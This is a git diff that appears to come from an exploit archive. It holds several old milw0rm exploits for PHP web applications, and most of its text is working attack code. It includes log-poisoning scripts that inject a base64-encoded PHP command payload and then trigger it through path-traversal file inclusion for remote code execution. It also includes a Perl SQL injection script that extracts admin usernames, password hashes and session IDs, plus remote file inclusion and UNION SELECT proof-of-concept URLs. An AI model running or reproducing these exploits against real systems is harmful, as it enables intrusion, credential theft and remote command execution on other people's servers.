+$config['dir_config'] = 'config/'; +$config['dir_core'] = 'core/'; +$config['dir_db'] = 'db/'; +$config['dir_js'] = 'js/'; +$config['dir_libraries'] = 'libraries/'; +$config['dir_tpl'] = 'templates/'; +$config['dir_files'] = 'files/'; +$config['dir_ext'] = 'ext/'; +$config['dir_plugins'] = 'plugins/'; +$config['dir_lang'] = 'lang/'; + +if( isset( $sLang ) && is_file( $config['dir_lang'].$sLang.'.php' ) && strlen( $sLang ) == 2 ){ + setCookie( 'sLanguage', $sLang, time( ) + 86400 ); + define( 'LANGUAGE', $sLang ); +} +else{ + if( isset( $_COOKIE['sLanguage'] ) ) <-------------------------[^] + define( 'LANGUAGE', $_COOKIE['sLanguage'] ); <-------------------------[^^] + else + define( 'LANGUAGE', $config['default_lang'] ); +} +################################################################################ + +and 
in index.php we can find line 32: + +################################################################################ +require_once DIR_LANG.LANGUAGE.'.php'; <-------------------------[^^^] +################################################################################ + +we can define LANGUAGE string. + +Now how remote code execution: + +in admin panel can upload any file on serwer, if you have admin login and password. Default admin login and password in script is "admin" many users dont change it!! +They don't edit file "config/general.php" lines 75-76: +$config['login'] = "admin"; +$config['pass'] = "admin"; + +;) + +Elo :) +*/ + +echo "insert evil code in logfiles to run local include ...\r\n\r\n"; +$hauru2 = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL". +"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS". +"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB". +"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj". +"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI". +"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX". +"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+"); +$pakiet="GET ".$p.$hauru2." HTTP/1.0\r\n"; +$pakiet.="User-Agent: ".$hauru2." 
Googlebot/2.1\r\n"; +$pakiet.="Host: ".$host."\r\n"; +$pakiet.="Connection: close\r\n\r\n"; +wyslijpakiet($pakiet); +sleep(1); +$paths= array ( +"../../../../../var/log/httpd/access_log", +"../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../etc/httpd/logs/access_log", +"../../../../../etc/httpd/logs/access.log", +"../../../../../etc/httpd/logs/error_log", +"../../../../../etc/httpd/logs/error.log", +"../../../../../var/www/logs/access_log", +"../../../../../var/www/logs/access.log", +"../../../../../usr/local/apache/logs/access_log", +"../../../../../usr/local/apache/logs/access.log", +"../../../../../var/log/apache/access_log", +"../../../../../var/log/apache/access.log", +"../../../../../var/log/access_log", +"../../../../../var/www/logs/error_log", +"../../../../../var/www/logs/error.log", +"../../../../../usr/local/apache/logs/error_log", +"../../../../../usr/local/apache/logs/error.log", +"../../../../../var/log/apache/error_log", +"../../../../../var/log/apache/error.log", +"../../../../../var/log/access_log", +"../../../../../var/log/error_log" +); +for ($i=0; $i<=count($paths)-1; $i++) +{$a=$i+2; +echo "[".$a."] Check Path: ".$paths[$i]."\r\n"; +echo "remote code execution...wait..\n"; +$pakiet ="GET ".$p."index.php HTTP/1.1\r\n"; +$pakiet.="Cookie: sLanguage=../".$paths[$i]."%00;\r\n"; +$pakiet.="HAURU: ".$cmd."\r\n"; 
+$pakiet.="Host: ".$host."\r\n"; +$pakiet.="Connection: Close\r\n\r\n"; +wyslijpakiet($pakiet); +if (strstr($html,"Hauru")) +{$temp=explode("Hauru",$html); +die($temp[1]); +}else{echo "can't run evil code :/ ..\n";}} +$data ="_POST[sLogin]=".$login."&_POST[sPass]=".$haslo."&submit=sign%20in%20»"; +$pakiet ="POST ".$p."admin.php?p=login HTTP/1.0\r\n"; +$pakiet.="Host: ".$host."\r\n"; +$pakiet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n"; +$pakiet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$pakiet.="Content-Length: ".strlen($data)."\r\n"; +$pakiet.="Accept: text/plain\r\n"; +$pakiet.="Connection: Close\r\n\r\n"; +$pakiet.=$data; +wyslijpakiet($pakiet); +$temp=explode("Set-Cookie: ",$html); +$cookie=""; +for ($i=1; $i + +# milw0rm.com [2007-06-02] diff --git a/platforms/php/webapps/4029.php b/platforms/php/webapps/4029.php index a87be293f..a8b6dcb44 100755 --- a/platforms/php/webapps/4029.php +++ b/platforms/php/webapps/4029.php 
@@ -1,176 +1,176 @@
-#!/usr/bin/php -q -d short_open_tag=on
-"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
- $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
- $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$code="";
-$packet="GET " . $p . $code . " HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: close\r\n\r\n";
-
-sendpacketii($packet);
-sleep(3);
-
-$paths= array (
-"../../../../../var/log/httpd/access_log",
-"../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../etc/httpd/logs/access_log",
-"../../../../../etc/httpd/logs/access.log",
-"../../../../../etc/httpd/logs/error_log",
-"../../../../../etc/httpd/logs/error.log",
-"../../../../../var/www/logs/access_log",
-"../../../../../var/www/logs/access.log",
-"../../../../../usr/local/apache/logs/access_log",
-"../../../../../usr/local/apache/logs/access.log",
-"../../../../../var/log/apache/access_log",
-"../../../../../var/log/apache/access.log",
-"../../../../../var/log/access_log",
-"../../../../../var/www/logs/error_log",
-"../../../../../var/www/logs/error.log",
-"../../../../../usr/local/apache/logs/error_log",
-"../../../../../usr/local/apache/logs/error.log",
-"../../../../../var/log/apache/error_log",
-"../../../../../var/log/apache/error.log",
-"../../../../../var/log/access_log",
-"../../../../../var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-$packet ="GET " . $p . "sendcard.php?sc_language=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: Close\r\n\r\n";
-
-sendpacketii($packet);
-
-if (strstr($html,"w4ckw4ck"))
- {
- $temp=explode("w4ckw4ck",$html);
- print "-------------------------------------------------------------------------\r\n";
- print " Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
- print "-------------------------------------------------------------------------\r\n";
- echo $temp[1];
- print "-------------------------------------------------------------------------\r\n";
- print " http://www.w4ck1ng.com\r\n";
- print " ...Silentz\r\n";
- print "-------------------------------------------------------------------------\r\n";
- exit;
- }
-}
-
- print "-------------------------------------------------------------------------\r\n";
- print " Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
- print "-------------------------------------------------------------------------\r\n";
- echo "[-] Exploit Failed...\r\n";
- print "-------------------------------------------------------------------------\r\n";
- print " http://www.w4ck1ng.com\r\n";
- print " ...Silentz\r\n";
- print "-------------------------------------------------------------------------\r\n";
-
-?>
-
-# milw0rm.com [2007-06-04]
+#!/usr/bin/php -q -d short_open_tag=on
+"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+ $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+ $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$code="";
+$packet="GET " . $p . $code . " HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: close\r\n\r\n";
+
+sendpacketii($packet);
+sleep(3);
+
+$paths= array (
+"../../../../../var/log/httpd/access_log",
+"../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../etc/httpd/logs/access_log",
+"../../../../../etc/httpd/logs/access.log",
+"../../../../../etc/httpd/logs/error_log",
+"../../../../../etc/httpd/logs/error.log",
+"../../../../../var/www/logs/access_log",
+"../../../../../var/www/logs/access.log",
+"../../../../../usr/local/apache/logs/access_log",
+"../../../../../usr/local/apache/logs/access.log",
+"../../../../../var/log/apache/access_log",
+"../../../../../var/log/apache/access.log",
+"../../../../../var/log/access_log",
+"../../../../../var/www/logs/error_log",
+"../../../../../var/www/logs/error.log",
+"../../../../../usr/local/apache/logs/error_log",
+"../../../../../usr/local/apache/logs/error.log",
+"../../../../../var/log/apache/error_log",
+"../../../../../var/log/apache/error.log",
+"../../../../../var/log/access_log",
+"../../../../../var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+$packet ="GET " . $p . "sendcard.php?sc_language=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: Close\r\n\r\n";
+
+sendpacketii($packet);
+
+if (strstr($html,"w4ckw4ck"))
+ {
+ $temp=explode("w4ckw4ck",$html);
+ print "-------------------------------------------------------------------------\r\n";
+ print " Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ echo $temp[1];
+ print "-------------------------------------------------------------------------\r\n";
+ print " http://www.w4ck1ng.com\r\n";
+ print " ...Silentz\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ exit;
+ }
+}
+
+ print "-------------------------------------------------------------------------\r\n";
+ print " Sendcard <= 3.4.1 Remote Code Execution Exploit\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ echo "[-] Exploit Failed...\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+ print " http://www.w4ck1ng.com\r\n";
+ print " ...Silentz\r\n";
+ print "-------------------------------------------------------------------------\r\n";
+
+?>
+
+# milw0rm.com [2007-06-04]
diff --git a/platforms/php/webapps/4030.php b/platforms/php/webapps/4030.php
index f877b805d..676384a0d 100755
--- a/platforms/php/webapps/4030.php
+++ b/platforms/php/webapps/4030.php
@@ -1,85 +1,85 @@
-#!/usr/bin/perl -w
-
-#################################################################################
-# #
-# EQdkp <= 1.3.2 SQL Injection Exploit #
-# #
-# Discovered by: Silentz #
-# Payload: Admin Username & Hash Retrieval #
-# Website: http://www.w4ck1ng.com #
-# #
-# Vulnerable Code (listmembers.php): #
-# #
-# $sql = 'SELECT m.*, (m.member_earned-m.member_spent+m.member_adjustment) #
-# AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix, #
-# r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS #
-# armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level #
-# FROM ' . MEMBERS_TABLE . ' m, ' . MEMBER_RANKS_TABLE . ' r, ' . CLASS_TABLE #
-# . ' c WHERE c.class_id = m.member_class_id AND (m.member_rank_id = #
-# r.rank_id)'; #
-# #
-# if ( !empty($_GET['rank']) ) #
-# { #
-# $sql .= " AND r.rank_name='" . urldecode($_GET['rank']) . "'"; #
-# } #
-# #
-# PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT #
-# 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 #
-# FROM eqdkp_users where user_id=1/* #
-# #
-# Subject To: Nothing, no authentication...nada! #
-# GoogleDork: Get your own! #
-# #
-# Shoutz: The entire w4ck1ng community #
-# #
-#################################################################################
-
-use LWP::UserAgent;
-if (@ARGV < 1){
-print "-------------------------------------------------------------------------\r\n";
-print " EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
-print "[PATH] = Path where EQdkp is located\r\n\r\n";
-print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print " http://www.w4ck1ng.com\r\n";
-print " ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-exit();
-}
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-
-print "-------------------------------------------------------------------------\r\n";
-print " EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-
-if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
-print "[+] Admin User : $1\n";}
-
-else {print "\n[-] Unable to retrieve admin username..."}
-
-if($res->content =~ /">([0-9a-fA-F]{32})<\/a><\/td>/){
-print "[+] Admin Hash : $1";}
-
-else {print "\n[-] Unable to retrieve admin hash...\n";}
-
-$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,session_id,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,NULL,NULL,0,0,0,0 FROM eqdkp_sessions where session_user_id=1/*";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-
-if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
-print "[+] Admin SessionID : $1\n";}
-
-else {print "\n[-] Unable to retrieve admin sessionid...he/she is not logged in!\n";}
-
-print "-------------------------------------------------------------------------\r\n";
-print " http://www.w4ck1ng.com\r\n";
-print " ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-
-# milw0rm.com [2007-06-04]
+#!/usr/bin/perl -w
+
+#################################################################################
+# #
+# EQdkp <= 1.3.2 SQL Injection Exploit #
+# #
+# Discovered by: Silentz #
+# Payload: Admin Username & Hash Retrieval #
+# Website: http://www.w4ck1ng.com #
+# #
+# Vulnerable Code (listmembers.php): #
+# #
+# $sql = 'SELECT m.*, (m.member_earned-m.member_spent+m.member_adjustment) #
+# AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix, #
+# r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS #
+# armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level #
+# FROM ' . MEMBERS_TABLE . ' m, ' . MEMBER_RANKS_TABLE . ' r, ' . CLASS_TABLE #
+# . ' c WHERE c.class_id = m.member_class_id AND (m.member_rank_id = #
+# r.rank_id)'; #
+# #
+# if ( !empty($_GET['rank']) ) #
+# { #
+# $sql .= " AND r.rank_name='" . urldecode($_GET['rank']) . "'"; #
+# } #
+# #
+# PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT #
+# 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 #
+# FROM eqdkp_users where user_id=1/* #
+# #
+# Subject To: Nothing, no authentication...nada! #
+# GoogleDork: Get your own! #
+# #
+# Shoutz: The entire w4ck1ng community #
+# #
+#################################################################################
+
+use LWP::UserAgent;
+if (@ARGV < 1){
+print "-------------------------------------------------------------------------\r\n";
+print " EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
+print "[PATH] = Path where EQdkp is located\r\n\r\n";
+print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print " http://www.w4ck1ng.com\r\n";
+print " ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+exit();
+}
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+
+print "-------------------------------------------------------------------------\r\n";
+print " EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+
+if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
+print "[+] Admin User : $1\n";}
+
+else {print "\n[-] Unable to retrieve admin username..."}
+
+if($res->content =~ /">([0-9a-fA-F]{32})<\/a><\/td>/){
+print "[+] Admin Hash : $1";}
+
+else {print "\n[-] Unable to retrieve admin hash...\n";}
+
+$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,session_id,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,NULL,NULL,0,0,0,0 FROM eqdkp_sessions where session_user_id=1/*";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+
+if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
+print "[+] Admin SessionID : $1\n";}
+
+else {print "\n[-] Unable to retrieve admin sessionid...he/she is not logged in!\n";}
+
+print "-------------------------------------------------------------------------\r\n";
+print " http://www.w4ck1ng.com\r\n";
+print " ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+
+# milw0rm.com [2007-06-04]
diff --git a/platforms/php/webapps/4031.txt b/platforms/php/webapps/4031.txt
index 93c5a9f70..12ee6051f 100755
--- a/platforms/php/webapps/4031.txt
+++ b/platforms/php/webapps/4031.txt
@@ -1,22 +1,22 @@
-###########################################################
-
-Madirish Webmail v2.0 Remote File Include Vulnerabilities
-
-Author : BoZKuRTSeRDaR
-
-Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM
-
-My Homepage :WwW.Turkmilliyetcileri.OrG
-
-script Download : http://sourceforge.net/projects/madirishwebmail
-
-###############################################################################
-
-code:
-require_once($GLOBALS['basedir']."lib/sql.php")
-
-exploit:
-
-http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
-
-# milw0rm.com [2007-06-04]
+###########################################################
+
+Madirish Webmail v2.0 Remote File Include Vulnerabilities
+
+Author : BoZKuRTSeRDaR
+
+Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM
+
+My Homepage :WwW.Turkmilliyetcileri.OrG
+
+script Download : http://sourceforge.net/projects/madirishwebmail
+
+###############################################################################
+
+code:
+require_once($GLOBALS['basedir']."lib/sql.php")
+
+exploit:
+
+http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
+
+# milw0rm.com [2007-06-04]
diff --git a/platforms/php/webapps/4034.txt b/platforms/php/webapps/4034.txt
index 1a422562f..f22113428 100755
--- a/platforms/php/webapps/4034.txt
+++ b/platforms/php/webapps/4034.txt
@@ -1,36 +1,36 @@ -++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++ -+ K-letter 1.0 << Remote File include + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ DownloadScript: http://www.scripts.com.ua/download.php?ID=813 + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ Cyber-warrior.org <<< sanal alemin DEV. + -+ + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ ERROR [1]; action.php? + -+ include ($scdir."admin/config.inc.php"); + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ BUG + -+ www.target.com/path/acrion.php?scdir=[3vil script] + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ ERROR [2]; subs.php? + -+ include $scdir."admin/config.inc.php"; + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ BUG + -+ www.target.com/path/subs.php?scdir=[3vil script] + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ ERROR [3]; unsubs.php? 
+ -+ include $scdir."admin/config.inc.php"; + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ BUG + -+ www.target.com/path/unsubs.php?scdir=[3vil script] + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+DORK:( + -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++ -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - -# milw0rm.com [2007-06-05] +++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++ ++ K-letter 1.0 << Remote File include + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ DownloadScript: http://www.scripts.com.ua/download.php?ID=813 + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ Cyber-warrior.org <<< sanal alemin DEV. + ++ + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ERROR [1]; action.php? + ++ include ($scdir."admin/config.inc.php"); + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ BUG + ++ www.target.com/path/acrion.php?scdir=[3vil script] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ERROR [2]; subs.php? + ++ include $scdir."admin/config.inc.php"; + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ BUG + ++ www.target.com/path/subs.php?scdir=[3vil script] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ERROR [3]; unsubs.php? 
+ ++ include $scdir."admin/config.inc.php"; + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ BUG + ++ www.target.com/path/unsubs.php?scdir=[3vil script] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++DORK:( + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +# milw0rm.com [2007-06-05] diff --git a/platforms/php/webapps/4035.txt b/platforms/php/webapps/4035.txt index 624b39ac8..1c0b8faf9 100755 --- a/platforms/php/webapps/4035.txt +++ b/platforms/php/webapps/4035.txt 
@@ -1,33 +1,33 @@
-*********************************************
- Comicsense SQL Injection Advisory/Exploit
-*********************************************
-
-by s0cratex
-s0cratex@hotmail.com
-http://plexinium.net
-
--
-ComicSense is a script using php / mySQL.
-It allows you to easily host an Online Comic
-or Image shack.
-You can download it from www.gayadesign.nl/comicsense/
--
-
-The bug is a common sql injection in "index.php"
-
-Line 32:
-$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
-And the variable $epi is not verified...
-
-Exploit:
---------
-Admin username
-http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users
-
-MD5 hash password:
-http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users
-
-e-Mail adress:
-http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users
-
-# milw0rm.com [2007-06-05]
+*********************************************
+ Comicsense SQL Injection Advisory/Exploit
+*********************************************
+
+by s0cratex
+s0cratex@hotmail.com
+http://plexinium.net
+
+-
+ComicSense is a script using php / mySQL.
+It allows you to easily host an Online Comic
+or Image shack.
+You can download it from www.gayadesign.nl/comicsense/
+-
+
+The bug is a common sql injection in "index.php"
+
+Line 32:
+$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
+And the variable $epi is not verified...
+
+Exploit:
+--------
+Admin username
+http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users
+
+MD5 hash password:
+http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users
+
+e-Mail adress:
+http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users
+
+# milw0rm.com [2007-06-05]
diff --git a/platforms/php/webapps/4036.php b/platforms/php/webapps/4036.php
index 95ae5aad5..5f84cf108 100755
--- a/platforms/php/webapps/4036.php
+++ b/platforms/php/webapps/4036.php
@@ -1,212 +1,212 @@
-#!/usr/bin/php -q -d short_open_tag=on
-"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
- $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
- $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$code="";
-$packet="GET " . $p . $code . " HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: close\r\n\r\n";
-
-sendpacketii($packet);
-sleep(3);
-
-$paths= array (
-"/../../../../../var/log/httpd/access_log",
-"/../../../../../var/log/httpd/error_log",
-"/../../../../../../var/log/httpd/access_log",
-"/../../../../../../var/log/httpd/error_log",
-"/../../../../../../../var/log/httpd/access_log",
-"/../../../../../../../var/log/httpd/error_log",
-"/../../../../../apache/logs/error.log",
-"/../../../../../apache/logs/access.log",
-"/../../../../../../apache/logs/error.log",
-"/../../../../../../apache/logs/access.log",
-"/../../../../../../../apache/logs/error.log",
-"/../../../../../../../apache/logs/access.log",
-"/../../../../../logs/error.log",
-"/../../../../../logs/access.log",
-"/../../../../../../logs/error.log",
-"/../../../../../../logs/access.log",
-"/../../../../../../../logs/error.log",
-"/../../../../../../../logs/access.log",
-"/../../../../../etc/httpd/logs/access_log",
-"/../../../../../etc/httpd/logs/access.log",
-"/../../../../../etc/httpd/logs/error_log",
-"/../../../../../etc/httpd/logs/error.log",
-"/../../../../../../etc/httpd/logs/access_log",
-"/../../../../../../etc/httpd/logs/access.log",
-"/../../../../../../etc/httpd/logs/error_log",
-"/../../../../../../etc/httpd/logs/error.log",
-"/../../../../../../../etc/httpd/logs/access_log",
-"/../../../../../../../etc/httpd/logs/access.log",
-"/../../../../../../../etc/httpd/logs/error_log",
-"/../../../../../../../etc/httpd/logs/error.log",
-"/../../../../../usr/local/apache/logs/access_log",
-"/../../../../../usr/local/apache/logs/access.log",
-"/../../../../../../usr/local/apache/logs/access_log",
-"/../../../../../../usr/local/apache/logs/access.log",
-"/../../../../../../../usr/local/apache/logs/access_log",
-"/../../../../../../../usr/local/apache/logs/access.log",
-"/../../../../../usr/local/apache/logs/error_log",
-"/../../../../../usr/local/apache/logs/error.log",
